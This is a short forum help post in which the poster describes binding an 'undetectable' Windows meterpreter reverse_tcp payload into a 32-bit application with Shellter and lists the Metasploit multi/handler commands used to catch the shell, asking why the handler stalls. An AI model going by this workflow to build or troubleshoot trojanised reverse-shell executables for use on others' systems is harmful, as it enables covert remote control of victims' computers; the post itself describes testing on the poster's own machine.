Hi, I used Shellter to create an undetectable reverse_tcp payload. Its bound with a win 32 bit application,which when run, gives us a meterpreter session. I ran it yesterday on my computer and it worked perfectly, i got a connection back. Im trying again today but msf keeps getting stuck at "Starting the Payload Handler..." I remade the payload with the new ip address and i have made sure the LHOST and LPORT are the same for the handler. Im pretty sure i havent made any typos or mistakes, here are the commands i used:
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.3.92
lhost => 192.168.3.92
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
Note I have given a diff IP address here for privacy reasons
And im am running kali linix on VMware
Thanks for any help
Comments
No Comments Exist
Be the first, drop a comment!